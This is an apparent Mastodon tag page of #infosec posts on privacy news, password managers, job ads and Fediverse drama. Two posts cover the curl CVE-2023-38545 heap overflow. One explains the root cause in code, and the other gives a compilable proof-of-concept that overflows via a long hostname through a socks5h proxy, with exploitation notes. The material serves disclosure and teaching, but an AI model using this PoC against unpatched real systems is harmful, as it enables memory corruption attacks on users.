Skip to main content

Search

Items tagged with: infosec


Random strangers getting paid to 'relay' YOUR texted login codes from THEIR phone numbers.

Privacy & security nightmare fuel.

Industry is turning away from texted verification because they are insecure... so what is #telegram thinking?

https://techcrunch.com/2024/03/25/telegrams-peer-to-peer-sms-login-service-is-a-privacy-nightmare/

#cybersecurity #infosec #privacy #doxxing #stalking #surveillance


You know it's interesting that I think @thunderbird is probably the one piece of software I have been using since Windows XP as a kid and still use it to this day. I even pay $10/year for a plugin to make Thunderbird work with my Office365 I use for my content creation so I can use it seamlessly on #Linux for contacts, calendar, and mail integration.

Despite all the email providers I have hopped between I still have used Thunderbird since around 2005 or 2006 #infosec #cybersecurity #opensource


Having trouble thinking of password security questions? Try one of these:

#infosec


No more rocket science, I'm moving to Post-Quantum encryption any day now...
https://tuta.com/blog/post-quantum-cryptography

@Tutanota
#infosec #cryptography


"For years, the antivirus software company harvested information from users’ web browsers without their consent." #infosec #privacy

Its clients have included Home Depot, Google, Microsoft, Pepsi, and McKinsey.

https://www.theverge.com/2024/2/22/24080135/avast-security-privacy-software-ftc-fine-data-harvesting


im getting really tired... -w-

summary of today:

someone on a Japanese hacker forum decided it was a good idea to spam the entire Fediverse because they wanted to cancel a minor that DDoSed a Discord bot which apparently made them lost millions (what?)

A Discord bot. I can't make this shit up man.

The real culprit seems to be someone who goes by mumei in the ctkpaarr.org forums, whose first post was literally a threat to ap12, that if they don't delete their "Kuroneko Server" Discord bot, they will spam every blog, forum and SNS and cancel him.

This shit is ridiculous.

The ap12 account from mastodon-japan was actually fake, and this dude impersonated a minor to get all of the Fediverse (us) to bully him.

The forum admins didn't even stop this. Why? lulz apparently. #fediblockmeta#fediadmins#fediadmin#mastoadmin#mastoadmins#spam#cybercrime#cybersec#infosec#drama#discord


NEW: WhatsApp will soon make it possible to chat with people who use other messaging apps. It's revealed some more details on how that will work.

— Apps will need to sign an agreement with Meta, then connect to its servers.
— Meta wants people to use the Signal Protocol, but also says other encryption protocols can be used if they can meet WhatsApp's standards
— WhatsApp has been testing with Matrix in recent months, although nothing is agreed yet. Swiss app Threema says it won't become interoperable

https://www.wired.com/story/whatsapp-interoperability-messaging/ #tech #whatsapp #dma #infosec #news #technology


This screenshot shows the app analytics data sent by two different #iOS apps: Duolingo and Tinder. What's the likelihood that both apps are installed on the same device? 💯? 🤯

Both apps use Unity Ads. The data in the screenshot is collected by the Unity Ads framework included in these two apps, and any app that uses Unity Ads. The data is sent to the same Unity server. As a result, Unity Ads can easily fingerprint users and track them across different apps.

#privacy #tracking #Apple #infosec


Hey #furries there's a bill in Oklahoma that was introduced & would punish children for dressing as a furry at school & have them taken away by Animal Control.

Rep. Humphrey has introduced a heap of shitty bills.😭

Bill Text: http://webserver1.lsb.state.ok.us/cf_pdf/2023-24%20INT/hB/HB3084%20INT.PDF

Other details: https://legiscan.com/OK/bill/HB3084/2024

#tech #infosec #nerds #oklahoma #


Getting security online right seems like a daunting task. But one thing is certain: Password managers help! 💪

🔥Here are our top three: https://tuta.com/blog/best-password-manager 🔥

What are your favorite #PasswordManagers

#privacy #security #opsec #passwords #passwordfatigue #databreach #breachdata #infosec

  • KeePassXC (49%, 218 votes)
  • Bitwarden (46%, 201 votes)
  • Pass (4%, 18 votes)
437 voters. Poll end: 1 month ago


What was your favorite #infosec talk, podcast, or white paper of 2023?


I feel like there's a whole bunch of cool accounts on Mastodon I haven't even heard of yet.
I love #infosec #3dprinting #lego #tcg #science #tech #memes and ducks 🦆​

Any suggestions? Tag anyone you think I should follow!


LibreOffice supports symmetric and asymmetric encryption for OpenDocument Format (ODF) files.

Symmetric encryption: https://en.wikipedia.org/wiki/Symmetric-key_algorithm
Asymmetric encryption: https://en.wikipedia.org/wiki/Public-key_cryptography

Select File > Save/Save As

The "Save with password" option encrypts the file with AES-256.
The "Encrypt with GPG key" option encrypts the file with a public key.

Website: https://www.libreoffice.org
Mastodon: @libreoffice

#LibreOffice #Encryption #OpenSource #OpenPGP #PGP #GnuPG #GPG #InfoSec #Privacy #Security


Fascinating and sophisticated MiTM ('man in the middle') at Hetzner (DE) and Linode, targeting Russia's largest XMPP/Jabber (civilian) chat service. The authors of the article make a reasonably compelling case that "this is lawful interception Hetzner and Linode were forced to setup."

https://notes.valdikss.org.ru/jabber.ru-mitm/

Excellent mitigation walkthrough here:

https://www.devever.net/~hl/xmpp-incident

Sure gets me thinking.

#infosec #sysadmin #forensics


#LibreOffice posted an article titled "WE WANT TO USE OUR USERS PERSONAL DATA" at https://design.blog.documentfoundation.org/2022/11/01/community-support-needed-we-want-to-use-our-users-personal-data/

LibreOffice was promoting a data collaboration with a company called polypoly. That article appears to contradict this post.

In the last entry in the comments section of the article the author states the project is on hold.

@libreoffice, what is the status of this project with polypoly? Is it still on hold or has it been cancelled?

#Privacy #InfoSec #TheDocumentFoundation @tdforg


Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?

The main reason for this is the type of code structure in question. In general state engines are quite difficult for static analysis tools, since as the name implies the state of the various variables depend on runtime state changes.

The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.

Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:

bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

The INIT state then set the “socks5_resolve_local” to TRUE if the host name is too long:

/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}

But this check is *only* done in INIT state. When the state is anything else, the initial value is used.

Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:

if(!socks5_resolve_local) {
if (… sx->hostname is literal IPv6 address …) {
… use ipv6 address direct …
}
else if (… sx->hostname is literal IPv4 address …) {
… use ipv4 address direct …
}
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
}
As “socks5_resolve_local” flag is FALSE for the excessively long hostname the “socksreq” heap buffer will be overflown by the memcpy call.

There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.

#vulnerability #staticanalysis #infosec


Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.

#infosec


Some exciting news: Over the past few months I have been working on founding a new organization: Blodeuwedd Labs (@blodeuweddlabs)

We are now in a position to offer subsidized security assessments (and other services) for open source projects.

(In addition to a whole array of analysis, development, and custom research offerings for everyone else)

Announcement (and more info): https://blodeuweddlabs.com/news/open-source-review-announce/

#infosec #security #appsec #canada #opensource


If you're using #bitwarden, make sure to change the KDF algorithm to Argon2id[^1] which is much more robust against GPU-powered attacks compared to its counterpart.

You can play around with this little calculator to see the impact of each algorithm on cracking cost estimation: https://passwordbits.com/passphrase-cracking-calculator/

[^1]: https://bitwarden.com/help/what-encryption-is-used/#argon2id

#security #infosec #password


:google: BREAKING: #Google to start deleting unused #email accounts so other people can use them.

🤔 What could possibly go wrong?

🤦‍♂️ Techbros are (still) idiots.

#Gmail #privacy #infosec

https://blog.google/technology/safety-security/updating-our-inactive-account-policies/


Google has just updated its 2FA Authenticator app and added a much-needed feature: the ability to sync secrets across devices.

TL;DR: Don't turn it on.

The new update allows users to sign in with their Google Account and sync 2FA secrets across their iOS and Android devices.

We analyzed the network traffic when the app syncs the secrets, and it turns out the traffic is not end-to-end encrypted. As shown in the screenshots, this means that Google can see the secrets, likely even while they’re stored on their servers. There is no option to add a passphrase to protect the secrets, to make them accessible only by the user.

Why is this bad?

Every 2FA QR code contains a secret, or a seed, that’s used to generate the one-time codes. If someone else knows the secret, they can generate the same one-time codes and defeat 2FA protections. So, if there’s ever a data breach or if someone obtains access .... 🧵

#Privacy #Cybersecurity #InfoSec #2FA #Google #Security


This dumb password rule is from Banco Mercantil.

8 to 15 chars. No special chars allowed but requires special chars. Also
requires lowercase, uppercase, and numbers. Consecutive chars are
prohibited. Did I mention the page hangs while you type? That eye icon
tho.

https://dumbpasswordrules.com/sites/banco-mercantil/

#password #passwords #infosec #cybersecurity #dumbpasswordrules


So Google is now preventing people from removing location data from photos taken with Pixel phones.

Remember when Google's corporate motto was "don't be evil?"

Obviously, accurate location data on photos is more useful to a data mining operation like Google.

From Google: "Important: You can only update or remove estimated locations. If the location of a photo or video was automatically added by your camera, you can't edit or remove the location."

It's enshitification in action.

Source: https://support.google.com/photos/answer/6153599?hl=en&sjid=8103501961576262529-AP

#technology #tech @technology #business #enshitification #Android #Google @pluralistic #infosec


#Mozilla has done some great things with #Firefox over the years, but Total Cookie Protection (essentially isolated cookie jars) is one of the most robust and privacy-conscious ways of handling cookies that I've seen in any browser today. It's a natural evolution of the "container tab" concept that prevents third parties from easily tracking you across the web.

https://blog.mozilla.org/en/mozilla/firefox-rolls-out-total-cookie-protection-by-default-to-all-users-worldwide/

#Tech #Browser #Privacy #InfoSec #Security #CyberSecurity #DataSecurity #Tracking


Hey there -- we're Let's Encrypt, the free and open certificate authority serving over 300 million websites worldwide. We're new to Mastodon and are excited to get to know the infosec community in this new space!

https://letsencrypt.org/

#opensource #TLS #PKI #infosec


Yours truly is looking for an #InfoSec / #Cybersecurity job in a safer state than Florida. I do pretty much all things security... like consulting, malware analysis, auditing, compliance, blue team, red team, purple team, SecDev, SecOps, SecDevOps, etc.

My kids are all grown now, so I am more than willing to travel / relocate. If you have any leads or tips on some good companies, please let me know.

#GetFediHired
[matrix] • [SimpleX]


Microsoft Authenticator prompts the user to accept sharing analytics during the first launch. The prompt only dismisses when the user taps on "Accept." In fact, the app starts sending analytics even before accepting the privacy statement.🤦‍♂️

In this video, we downloaded the authenticator app from the App Store and we opened it as we monitored the iPhone network traffic. While the app was showing the permission prompt, we captured at least 3 calls made by the app sending diagnostics to Microsoft. The app sent 14 KB of analytics even before accepting the prompt.

The message on the prompt actually says that Microsoft needs to collect diagnostic data in order to keep Authenticator secure and up to date. 😵‍💫

#Privacy #Cybersecurity #2FA #InfoSec #Security #Microsoft

https://youtu.be/r5456XXG6v0


Many iPhone users are asking us to recommend safe authenticator apps. Well, the App Store is making it useless to recommend any app. No matter what you search for, the top hit is almost always an ad for a scam app.

#Apple #AppStore #2FA #InfoSec


Please boost! We are *hiring* for *two* jobs in information security! Come work with our amazing team building solutions for the security have-nots in our world!

Red Queen Dynamics needs 1) a leader for engineering/cloud infrastructure, and 2) a product designer. We are a remote-first security company and we welcome people from all backgrounds and life journeys. #infosec #infosecjobs #hiring #cybersecurity

You can apply here! Tech Lead: https://www.linkedin.com/jobs/view/3475289250/

Product Designer: https://www.linkedin.com/jobs/view/3475289426/

Or stay up to date with all our job postings on our website: https://rqdn.io/career-opportunities


I know there is a lot going on at Twitter right now, but here's one more thing. Twitter is ignoring #GDPR requests from people to delete their DMs.

At the moment, when you press delete on a Twitter DM (an individual message or conversation) the DM isn't actually deleted from Twitter's servers, just your inbox view.

So people in Europe have been making requests for Twitter to blitz all their messages. It hasn't properly answered them. And now regulators are looking at it

Full story here: https://www.wired.com/story/delete-twitter-dms-gdpr/

#Twitter #gdpr #infosec #technology #news #wired


It's trivial to determine the real IP of a Mastodon server behind Cloudflare. All it takes is one well-crafted request:

https://gist.github.com/cutiful/4f36da3ed37b24f9a7106064393f5e7f

I wonder how many instance admins using Cloudflare know about this? My hunch is most do not, because the primary justification I see for using Cloudflare here is DDoS protection.

Cloudflare won't help if the attacker knows your origin IP, and you can't hide that with Cloudflare alone, due to the nature of ActivityPub.

#MastoAdmin #InfoSec


People following my account for a while probably noticed me talking about South Korea every now and then. I’ve hinted towards doing some important research, and now the time has finally come for the first disclosures.

But first I need to do a bunch of explaining because most people (my past self from a few months ago included) are largely unfamiliar with the Korean software landscape. See: they have those “security” applications that everyone has to install if they want to use online banking for example.

What could possibly go wrong with applications developed by private vendors without any kind of security vetting and that everyone in a country has to install, whether they like it or not? A lot of course.

In this first blog post I explain how in my limited understanding the current situation came about, show why the companies lack incentive to really invest in security and give you a first slight idea of the disastrous consequences.

No, I’m not exaggerating. The next blog post is scheduled for January 9th, and it will be about a specific application. I submitted seven vulnerability reports for this one. It took a real issue and claimed to have solved it – by making matters considerably worse than they were.

https://palant.info/2023/01/02/south-koreas-online-security-dead-end/

#infosec #ApplicationSecurity #privacy #korea


Compromised PyTorch-nightly dependency chain between December 25th and December 30th, 2022.

Steals all your SSH keys!

"If you installed PyTorch-nightly on Linux via pip between December 25, 2022 and December 30, 2022, please uninstall it and torchtriton immediately, and use the latest nightly binaries (newer than Dec 30th 2022)."

#infosec #machinelearning #deeplearning

https://pytorch.org/blog/compromised-nightly-dependency/

https://news.ycombinator.com/item?id=34202836


🔓 Like good neocolonizers, #humanitarian organizations & #nonprofits, like militaries, also collect vast amounts of #biometric & other private information about people with reckless disregard for basic #privacy and #security concepts.

✊🏽 We must hold them accountable for the risks and damages their actions cause: it's unacceptable to allow society to continue this way.

:pesthorn: Thanks to #CCC for helping expose the dangerous truth.

#SurevillanceCapitalism #infosec

https://web.archive.org/web/20221227125216/https://www.nytimes.com/2022/12/27/technology/for-sale-on-ebay-a-military-database-of-fingerprints-and-iris-scans.html